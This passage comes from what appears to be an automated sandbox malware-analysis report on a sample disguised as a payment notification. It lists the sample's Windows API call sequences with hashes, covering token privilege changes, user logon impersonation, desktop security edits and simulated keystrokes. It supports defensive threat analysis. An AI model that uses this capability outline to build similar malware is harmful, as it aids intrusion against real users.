                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: File$Pointer$Write
                                                                              • String ID:
                                                                              • API String ID: 3847668363-0
                                                                              • Opcode ID: 67536c6e3a5731c116b4dc40ba0efadae26530ce5ed82b5436f14a443c77041f
                                                                              • Instruction ID: b58e91a27f14aa8ab6733aa418608de6dcf87dcd2a5b3d4fbcf0ec7e42b9a682
                                                                              • Opcode Fuzzy Hash: 67536c6e3a5731c116b4dc40ba0efadae26530ce5ed82b5436f14a443c77041f
                                                                              • Instruction Fuzzy Hash: 09E03076400604EFC7219F56D941C9ABBF8FF84751710852FE99582114D771AA54DB60
                                                                              APIs
                                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008E2DC4
                                                                                • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: LongNamePath_wcslen
                                                                              • String ID:
                                                                              • API String ID: 541455249-0
                                                                              • Opcode ID: 6de7f2b415c3557f34796a73351ae0f1800bde45458397852044a18c8d4481e3
                                                                              • Instruction ID: 13802ecb18c35bd67c5232ebfa84e1d4e3c7560424a0c3fdd0aab5e663a6726a
                                                                              • Opcode Fuzzy Hash: 6de7f2b415c3557f34796a73351ae0f1800bde45458397852044a18c8d4481e3
                                                                              • Instruction Fuzzy Hash: 7EE0CD726041245BC71092589C05FDA77DDEFC87D0F040075FD09D7258DA60EDC08551
                                                                              APIs
                                                                                • Part of subcall function 008E3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008E3908
                                                                                • Part of subcall function 008ED730: GetInputState.USER32 ref: 008ED807
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008E2B6B
                                                                                • Part of subcall function 008E30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 008E314E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                              • String ID:
                                                                              • API String ID: 3667716007-0
                                                                              • Opcode ID: f592ffca3168cc947d7e8e5f5fb64b2e2e68a3fbe387e4b275f2d53d2301b736
                                                                              • Instruction ID: fe90da762833e17b94a52b9526af4db108ef09596f1607f93f2e385b3f0e9d99
                                                                              • Opcode Fuzzy Hash: f592ffca3168cc947d7e8e5f5fb64b2e2e68a3fbe387e4b275f2d53d2301b736
                                                                              • Instruction Fuzzy Hash: 0BE0DF2230828402C604BB2AA82A5ADA34AEBD3321F80053EF092C3172CE2049894213
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,00000000,?,00920704,?,?,00000000,?,00920704,00000000,0000000C), ref: 009203B7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 23d56db177c32b5e78b96f0b89fbd678b0cc3da2375502f27194c18e6b2fe9c1
                                                                              • Instruction ID: ca51e2242a9ba4596f7ea85d6db6aeccfe885bf89c32f0bbdc503813700dc767
                                                                              • Opcode Fuzzy Hash: 23d56db177c32b5e78b96f0b89fbd678b0cc3da2375502f27194c18e6b2fe9c1
                                                                              • Instruction Fuzzy Hash: 8CD06C3205410DBBDF028F84DD06EDA3BAAFB48714F014050BE1856020C732E861AB90
                                                                              APIs
                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 008E1CBC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: InfoParametersSystem
                                                                              • String ID:
                                                                              • API String ID: 3098949447-0
                                                                              • Opcode ID: bd322b9f4781a78235aacfa149bd94f55be3f84a0d6e011b67cb6d739b3dffba
                                                                              • Instruction ID: 74923f206605c51bd60fe1e2105ea1e383ee658d0192f30e55ccf7ab100116ee
                                                                              • Opcode Fuzzy Hash: bd322b9f4781a78235aacfa149bd94f55be3f84a0d6e011b67cb6d739b3dffba
                                                                              • Instruction Fuzzy Hash: 39C09B3629C3049FF3144780BD5EF107754E348B10F444101F60D555E3D3E22450F750
                                                                              APIs
                                                                                • Part of subcall function 008E5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,008E949C,?,00008000), ref: 008E5773
                                                                              • GetLastError.KERNEL32(00000002,00000000), ref: 009576DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CreateErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 1214770103-0
                                                                              • Opcode ID: 025bb9fc3c0812e9cd6337ab3534c2a78979b0ce98f8ae7114a189a0045ffce0
                                                                              • Instruction ID: 81e4417a55c5852bcfe8540d69538b788d923b68f3e746cdbae4b47817c93c45
                                                                              • Opcode Fuzzy Hash: 025bb9fc3c0812e9cd6337ab3534c2a78979b0ce98f8ae7114a189a0045ffce0
                                                                              • Instruction Fuzzy Hash: 5C81C0302087419FC714EF69D491A69B7E5FF8A314F04451CF8969B2A2DB70EE49CB93
                                                                              APIs
                                                                              • CloseHandle.KERNELBASE(?,?,00000000,009224E0), ref: 008E6266
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: b6ef975268ffcc0118a8ec83fd535d61f73ea44d6edaff9bc0952bd64e2f26ff
                                                                              • Instruction ID: 6c5260a8e03e5321fcb591ab561b5b00eddf51da6ff8de64beaccbba1bebecf2
                                                                              • Opcode Fuzzy Hash: b6ef975268ffcc0118a8ec83fd535d61f73ea44d6edaff9bc0952bd64e2f26ff
                                                                              • Instruction Fuzzy Hash: 71E0B675400B01CFD3314F1BE804412FBF5FFE23A13204A2ED1E592660E3B058969F51
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000001F4), ref: 041BF521
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1707992061.00000000041BD000.00000040.00000020.00020000.00000000.sdmp, Offset: 041BD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_41bd000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction ID: 198dce1ecc5270ef9cf28673f189aee4510341aa80a11c53b9e7420c4f1efa40
                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction Fuzzy Hash: DFE0BF7494010D9FDB00EFA8D9496DE7BB4EF04301F1045A1FD01D2281D7309A508A62
                                                                              APIs
                                                                                • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0097961A
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0097965B
                                                                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0097969F
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009796C9
                                                                              • SendMessageW.USER32 ref: 009796F2
                                                                              • GetKeyState.USER32(00000011), ref: 0097978B
                                                                              • GetKeyState.USER32(00000009), ref: 00979798
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009797AE
                                                                              • GetKeyState.USER32(00000010), ref: 009797B8
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009797E9
                                                                              • SendMessageW.USER32 ref: 00979810
                                                                              • SendMessageW.USER32(?,00001030,?,00977E95), ref: 00979918
                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0097992E
                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00979941
                                                                              • SetCapture.USER32(?), ref: 0097994A
                                                                              • ClientToScreen.USER32(?,?), ref: 009799AF
                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 009799BC
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009799D6
                                                                              • ReleaseCapture.USER32 ref: 009799E1
                                                                              • GetCursorPos.USER32(?), ref: 00979A19
                                                                              • ScreenToClient.USER32(?,?), ref: 00979A26
                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00979A80
                                                                              • SendMessageW.USER32 ref: 00979AAE
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00979AEB
                                                                              • SendMessageW.USER32 ref: 00979B1A
                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00979B3B
                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00979B4A
                                                                              • GetCursorPos.USER32(?), ref: 00979B68
                                                                              • ScreenToClient.USER32(?,?), ref: 00979B75
                                                                              • GetParent.USER32(?), ref: 00979B93
                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00979BFA
                                                                              • SendMessageW.USER32 ref: 00979C2B
                                                                              • ClientToScreen.USER32(?,?), ref: 00979C84
                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00979CB4
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00979CDE
                                                                              • SendMessageW.USER32 ref: 00979D01
                                                                              • ClientToScreen.USER32(?,?), ref: 00979D4E
                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00979D82
                                                                                • Part of subcall function 008F9944: GetWindowLongW.USER32(?,000000EB), ref: 008F9952
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00979E05
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                              • String ID: @GUI_DRAGID$F
                                                                              • API String ID: 3429851547-4164748364
                                                                              • Opcode ID: f94e40c06a037ab1a7e0d37c8400a7d5ab54f825d0193d0e1683d850adc0de19
                                                                              • Instruction ID: e019a6dcb2e108706d1d2e8040a9117aa28c5f2e469d63916f2fdb9115613a5d
                                                                              • Opcode Fuzzy Hash: f94e40c06a037ab1a7e0d37c8400a7d5ab54f825d0193d0e1683d850adc0de19
                                                                              • Instruction Fuzzy Hash: 07429F72208241AFD724CF28CC84EAABBE9FF49724F14861DF69D872A1D731E850DB51
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 009748F3
                                                                              • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00974908
                                                                              • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00974927
                                                                              • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0097494B
                                                                              • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0097495C
                                                                              • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0097497B
                                                                              • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 009749AE
                                                                              • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 009749D4
                                                                              • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00974A0F
                                                                              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00974A56
                                                                              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00974A7E
                                                                              • IsMenu.USER32(?), ref: 00974A97
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00974AF2
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00974B20
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00974B94
                                                                              • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00974BE3
                                                                              • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00974C82
                                                                              • wsprintfW.USER32 ref: 00974CAE
                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00974CC9
                                                                              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00974CF1
                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00974D13
                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00974D33
                                                                              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00974D5A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                              • String ID: %d/%02d/%02d
                                                                              • API String ID: 4054740463-328681919
                                                                              • Opcode ID: aeeefec0cf1f15ef828e09c922625e4e859521ec7bf1356fcc05e3e9998fbbbd
                                                                              • Instruction ID: f903ff482444356f82bb6a63bc460559fce8aa3f1ab6b89e814dd0ac2b6d8af2
                                                                              • Opcode Fuzzy Hash: aeeefec0cf1f15ef828e09c922625e4e859521ec7bf1356fcc05e3e9998fbbbd
                                                                              • Instruction Fuzzy Hash: F512D172600259ABEB258F28CC49FAE7BF8FF85710F108529F51ADB2E2D7749941CB50
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 008FF998
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0093F474
                                                                              • IsIconic.USER32(00000000), ref: 0093F47D
                                                                              • ShowWindow.USER32(00000000,00000009), ref: 0093F48A
                                                                              • SetForegroundWindow.USER32(00000000), ref: 0093F494
                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0093F4AA
                                                                              • GetCurrentThreadId.KERNEL32 ref: 0093F4B1
                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0093F4BD
                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0093F4CE
                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0093F4D6
                                                                              • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0093F4DE
                                                                              • SetForegroundWindow.USER32(00000000), ref: 0093F4E1
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093F4F6
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0093F501
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093F50B
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0093F510
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093F519
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0093F51E
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093F528
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0093F52D
                                                                              • SetForegroundWindow.USER32(00000000), ref: 0093F530
                                                                              • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0093F557
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 4125248594-2988720461
                                                                              • Opcode ID: d320d4174f145755e38b8fe2960bd7909d99b7ede16ccf82983d3571542e674a
                                                                              • Instruction ID: b1bd0d4e5a3bbf9f520df1b4909ad01dd5e1fdb025e210e326d5bef981a8d6da
                                                                              • Opcode Fuzzy Hash: d320d4174f145755e38b8fe2960bd7909d99b7ede16ccf82983d3571542e674a
                                                                              • Instruction Fuzzy Hash: F73154B2E54218BBEB206BB55C4AFBF7E6CEB44B50F100469F605EA1D1C6B15D40BE60
                                                                              APIs
                                                                                • Part of subcall function 009416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094170D
                                                                                • Part of subcall function 009416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0094173A
                                                                                • Part of subcall function 009416C3: GetLastError.KERNEL32 ref: 0094174A
                                                                              • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00941286
                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 009412A8
                                                                              • CloseHandle.KERNEL32(?), ref: 009412B9
                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009412D1
                                                                              • GetProcessWindowStation.USER32 ref: 009412EA
                                                                              • SetProcessWindowStation.USER32(00000000), ref: 009412F4
                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00941310
                                                                                • Part of subcall function 009410BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009411FC), ref: 009410D4
                                                                                • Part of subcall function 009410BF: CloseHandle.KERNEL32(?,?,009411FC), ref: 009410E9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                              • String ID: $default$winsta0
                                                                              • API String ID: 22674027-1027155976
                                                                              • Opcode ID: b6782fad9009e8b5bd5cf7e9370b9637d8e47b0e45e1d13b5958c82b1afb1fc9
                                                                              • Instruction ID: 58698ff75fdb97ed078b3c8e341eb587243f3ff4aff9026a33b1df1472d30973
                                                                              • Opcode Fuzzy Hash: b6782fad9009e8b5bd5cf7e9370b9637d8e47b0e45e1d13b5958c82b1afb1fc9
                                                                              • Instruction Fuzzy Hash: 00819AB2A00209AFDF209FA4DC49FEE7BBDEF44704F144129FA14E62A0D7349984DB65
                                                                              APIs
                                                                                • Part of subcall function 009410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00941114
                                                                                • Part of subcall function 009410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941120
                                                                                • Part of subcall function 009410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 0094112F
                                                                                • Part of subcall function 009410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941136
                                                                                • Part of subcall function 009410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0094114D
                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00940BCC
                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00940C00
                                                                              • GetLengthSid.ADVAPI32(?), ref: 00940C17
                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00940C51
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00940C6D
                                                                              • GetLengthSid.ADVAPI32(?), ref: 00940C84
                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00940C8C
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00940C93
                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00940CB4
                                                                              • CopySid.ADVAPI32(00000000), ref: 00940CBB
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00940CEA
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00940D0C
                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00940D1E
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940D45
                                                                              • HeapFree.KERNEL32(00000000), ref: 00940D4C
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940D55
                                                                              • HeapFree.KERNEL32(00000000), ref: 00940D5C
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940D65
                                                                              • HeapFree.KERNEL32(00000000), ref: 00940D6C
                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00940D78
                                                                              • HeapFree.KERNEL32(00000000), ref: 00940D7F
                                                                                • Part of subcall function 00941193: GetProcessHeap.KERNEL32(00000008,00940BB1,?,00000000,?,00940BB1,?), ref: 009411A1
                                                                                • Part of subcall function 00941193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00940BB1,?), ref: 009411A8
                                                                                • Part of subcall function 00941193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00940BB1,?), ref: 009411B7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
